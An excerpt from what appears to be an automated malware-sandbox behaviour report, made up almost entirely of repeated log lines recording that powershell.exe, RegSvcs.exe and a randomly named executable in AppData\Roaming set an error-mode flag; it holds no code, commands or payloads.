                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
